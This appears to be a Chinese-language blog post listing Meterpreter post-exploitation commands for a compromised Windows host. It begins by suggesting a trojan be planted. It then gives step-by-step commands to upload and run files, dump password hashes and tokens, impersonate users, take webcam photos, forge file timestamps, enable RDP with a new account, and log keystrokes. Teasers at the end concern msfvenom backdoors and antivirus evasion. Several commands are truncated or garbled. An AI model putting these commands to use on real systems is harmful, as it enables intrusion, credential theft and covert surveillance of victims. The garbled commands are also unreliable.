meterpreter後期攻擊使用方法

2021-10-10 21:46:32 字數 2324 閱讀 2991

製作木馬pcshare,遠控軟體,網上尋找軟體上傳到目標主機

1、上傳檔案到windows主機

簡單來說,就是你可以上傳本機的任意檔案到遠端目標主機中。

meterpreter >   upload 


meterpreter > upload //root c:
注意:使用-r可以遞迴上傳目錄和檔案

2、在目標主機上強行執行exe檔案

meterpreter >   execute -f 


[options]


meterpreter > execute -f c://"documents and settings"//owner//desktop #帶空格的路徑


meterpreter > execute -f c:
meterpreter >   download 


meterpreter > download c:
4、執行cmd
meterpreter >   execute -f cmd -c 或  shell
5、檢視對方程序
meterpreter >


ps
6、獲取對方管理員許可權
meterpreter >   get 


meterpreter > getsystem
7、使用hashdump轉儲所有hash值

8、彩虹表工具kali–ophcrack hashcat

9、使用credcollect轉儲hash值

還有乙個類似的指令碼叫credential_collector,也可以收集目標主機的tokens

meterpreter >   run credcollect
10、建立埠**

meterpreter shell中的portfwd命令是**技術中最常用的乙個命令,可以讓攻擊系統訪問本來無法直接訪問的目標主機

add 選項會將埠**新增到列表中,而且本質上會建立乙個隧道。

note: 這個隧道存在於meterpreter控制台之外,如何終端會話都可以使用。

meterpreter >portfwd add -l 6666 -p 3389 -r 127.0.0.1
將目標機的3389埠**到本地6666埠

11、檢視使用者id

meterpreter >getuid


meterpreter >sysinfo
15、模擬任意使用者(token操作)

只需要輸入use incognito命令即可

輸入list_tokens -u來顯示所有有效的tokens

然後我們需要模擬某個token來獲取其許可權,如果成功模擬乙個token,可以使用getuid檢查當前使用者id

meterpreter >use incognito


meterpreter >list_tokens -u


meterpreter >impersonate_token "你想切換的賬號"
16、webcam攝像頭命令
meterpreter >webcam_list  #檢視攝像頭


meterpreter >webcam_snap #通過攝像頭拍照
17、timestomp偽造時間戳
meterpreter >timestomp c:// -h  #檢視幫助


meterpreter >timestomp -v c: #檢視時間戳


meterpreter >timestomp c: -f c: #將1.txt的時間戳複製給2.txt
18、enable_rdp指令碼開啟3389
meterpreter >run post/windows/manage/enable_rdp #開啟遠端桌面


meterpreter >run post/windows/manage/enable_rdp username=www2 password=123456 #新增使用者


meterpreter >run post/windows/manage/enable_rdp forward=true lport=6662 #將對方3389**到對方6662
19、鍵盤記錄
meterpreter >keyscan_start  #開啟鍵盤記錄


meterpreter >keyscan_dump #匯出鍵盤記錄


meterpreter >keyscan_stop #結束鍵盤記錄

Meterpreter核心命令

掌握meterpreter常見的基本命令的使用 1 meterpreter介紹 meterpreter是metasploit框架中的乙個擴充套件模組,作為溢位成功以後的攻擊載荷使用,攻擊載荷在溢位攻擊成功以後給我們返回乙個控制通道。使用它作為攻擊載荷能夠獲得目標系統的乙個meterpretershe...

6 1 meterpreter建立後門

1 使用msfvenom putty.exe程式,生成後門程式bd putty.exe。該程式與宿主程式具體相同的功能,當執行後門程式的同時,將執行攻擊載荷。msfvenom a x64 platform windows x opt putty.exe k p windows x64 meterpr...

利用meterpreter下的Venom免殺後門

1 tar.gz or zip or git clone 2.賦予檔案可執行許可權 cd venom main sudo chmod r x sh sudo chmod r x py 3.安裝依賴關係包 cd aux sudo setup.sh 4.執行 sudo venom.sh 目標機 win7...